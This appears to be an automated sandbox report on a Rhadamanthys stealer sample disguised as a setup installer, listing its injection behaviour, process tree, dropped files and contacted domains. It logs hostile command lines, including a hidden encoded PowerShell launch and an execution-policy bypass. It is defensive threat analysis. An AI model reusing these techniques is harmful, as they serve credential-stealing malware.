Malware Analysis Report

2024-11-30 02:10

Sample ID 240329-jzdtfadf77
Target setup.zip
SHA256 b2045d805874c29a618be48bec7b68b3eab23cb4a42464d3d64327a621134dbb
Tags
rhadamanthys stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

b2045d805874c29a618be48bec7b68b3eab23cb4a42464d3d64327a621134dbb

Threat Level: Known bad

The file setup.zip was found to be: Known bad.

Malicious Activity Summary

rhadamanthys stealer

Suspicious use of NtCreateUserProcessOtherParentProcess

Rhadamanthys

Blocklisted process makes network request

Enumerates connected drives

Suspicious use of SetThreadContext

Drops file in System32 directory

Executes dropped EXE

Drops file in Windows directory

Loads dropped DLL

Program crash

Unsigned PE

Suspicious use of UnmapMainImage

Suspicious use of SetWindowsHookEx

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-29 08:06

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-29 08:06

Reported

2024-03-29 08:08

Platform

win10v2004-20240226-en

Max time kernel

91s

Max time network

97s

Command Line

sihost.exe

Signatures

Rhadamanthys

stealer rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 1792 created 2420 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\system32\sihost.exe

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1280 set thread context of 1792 N/A C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe C:\Windows\SysWOW64\explorer.exe

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e576b1e.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI6BE9.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI6F36.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI7003.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e576b1e.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI6FD3.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI70EF.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI70CF.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{40687992-D47D-43B1-8A2C-57D30E7D9D88} C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI9272.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e576b22.msi C:\Windows\system32\msiexec.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\TnidhJHVeb9CHno\svchost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\TnidhJHVeb9CHno\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\TnidhJHVeb9CHno\svchost.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3308 wrote to memory of 4424 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3308 wrote to memory of 4424 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3308 wrote to memory of 4424 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 4424 wrote to memory of 440 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4424 wrote to memory of 440 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4424 wrote to memory of 440 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3308 wrote to memory of 1280 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe
PID 3308 wrote to memory of 1280 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe
PID 3308 wrote to memory of 1280 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe
PID 1280 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe C:\Windows\SysWOW64\explorer.exe
PID 1280 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe C:\Windows\SysWOW64\explorer.exe
PID 1280 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe C:\Windows\SysWOW64\explorer.exe
PID 1280 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe C:\Windows\SysWOW64\explorer.exe
PID 1792 wrote to memory of 4988 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1792 wrote to memory of 4988 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1792 wrote to memory of 1108 N/A C:\Windows\SysWOW64\explorer.exe C:\Users\Admin\AppData\Local\Temp\TnidhJHVeb9CHno\svchost.exe
PID 1792 wrote to memory of 1108 N/A C:\Windows\SysWOW64\explorer.exe C:\Users\Admin\AppData\Local\Temp\TnidhJHVeb9CHno\svchost.exe
PID 1792 wrote to memory of 916 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\rundll32.exe
PID 1792 wrote to memory of 916 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\rundll32.exe
PID 1792 wrote to memory of 916 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\rundll32.exe
PID 1792 wrote to memory of 2160 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\dialer.exe
PID 1792 wrote to memory of 2160 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\dialer.exe
PID 1792 wrote to memory of 2160 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\dialer.exe
PID 1792 wrote to memory of 2160 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\dialer.exe
PID 1792 wrote to memory of 2160 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\dialer.exe

Processes

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\msiexec.exe

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\setup.msi

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 61AD839F34300B4D3AF3AA2949DBD0A1

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss716A.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi7167.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr7168.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr7169.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."

C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe

"C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe"

C:\Windows\SysWOW64\explorer.exe

explorer.exe

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -windowstyle hidden -e [base64-encoded command not reproduced on this page]

C:\Users\Admin\AppData\Local\Temp\TnidhJHVeb9CHno\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\TnidhJHVeb9CHno\svchost.exe"

C:\Windows\SysWOW64\rundll32.exe

rundll32 "C:\Users\Admin\AppData\Local\Temp\L0F8JTNzuAJ3vfq\svchost.dll", PluginInit

C:\Windows\SysWOW64\dialer.exe

"C:\Windows\system32\dialer.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1792 -ip 1792

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1792 -s 2184

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1792 -ip 1792

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1792 -s 2180

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1792 -ip 1792

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1792 -s 2188

Network

Country Destination Domain Proto
US 8.8.8.8:53 81.171.91.138.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 40.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 thecurl.monster udp
US 104.21.31.116:80 thecurl.monster tcp
US 104.21.31.116:443 thecurl.monster tcp
US 8.8.8.8:53 116.31.21.104.in-addr.arpa udp
US 8.8.8.8:53 death1488.com udp
US 172.67.151.174:80 death1488.com tcp
US 8.8.8.8:53 174.151.67.172.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 the.earth.li udp
GB 93.93.131.124:443 the.earth.li tcp
US 8.8.8.8:53 124.131.93.93.in-addr.arpa udp
US 8.8.8.8:53 32.169.19.2.in-addr.arpa udp
US 8.8.8.8:53 26.143.101.95.in-addr.arpa udp
US 8.8.8.8:53 curlhub.monster udp
US 172.67.204.219:443 curlhub.monster tcp
US 8.8.8.8:53 219.204.67.172.in-addr.arpa udp
US 8.8.8.8:53 ot4.pw udp
US 104.21.5.62:443 ot4.pw tcp
US 8.8.8.8:53 62.5.21.104.in-addr.arpa udp
US 8.8.8.8:53 35.206.58.216.in-addr.arpa udp
US 8.8.8.8:53 raur94.com udp
US 104.21.68.134:80 raur94.com tcp
US 104.21.68.134:443 raur94.com tcp
US 8.8.8.8:53 134.68.21.104.in-addr.arpa udp
US 8.8.8.8:53 checkass.monster udp
US 104.21.2.229:443 checkass.monster tcp
US 8.8.8.8:53 229.2.21.104.in-addr.arpa udp
US 8.8.8.8:53 152.33.115.104.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp

Files

C:\Windows\Installer\MSI6BE9.tmp

C:\Windows\Installer\MSI70EF.tmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gkpvpgh4.1bj.ps1

C:\Users\Admin\AppData\Local\Temp\pss716A.ps1

C:\Users\Admin\AppData\Local\Temp\scr7168.ps1

C:\Users\Admin\AppData\Local\Temp\msi7167.txt

C:\Config.Msi\e576b21.rbs

C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe

C:\Windows\Installer\e576b1e.msi

C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\libassuan-0.dll

C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\libsqlite3-0.dll

C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\zlib1.dll

C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\libnpth-0.dll

C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\libgcrypt-20.dll

C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\libgpg-error-0.dll

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Temp\TnidhJHVeb9CHno\svchost.exe

C:\Users\Admin\AppData\Local\Temp\L0F8JTNzuAJ3vfq\svchost.dll

C:\Users\Admin\AppData\Local\Temp\putty_1108_0.chm

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-29 08:06

Reported

2024-03-29 08:08

Platform

win7-20240221-en

Max time kernel

120s

Max time network

121s

Command Line

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\setup.msi

Signatures

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\MSI22EF.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f762004.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI2ACC.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f761fff.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f761fff.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI207C.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI21B5.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI2252.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f762002.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f762002.ipi C:\Windows\system32\msiexec.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\msiexec.exe N/A
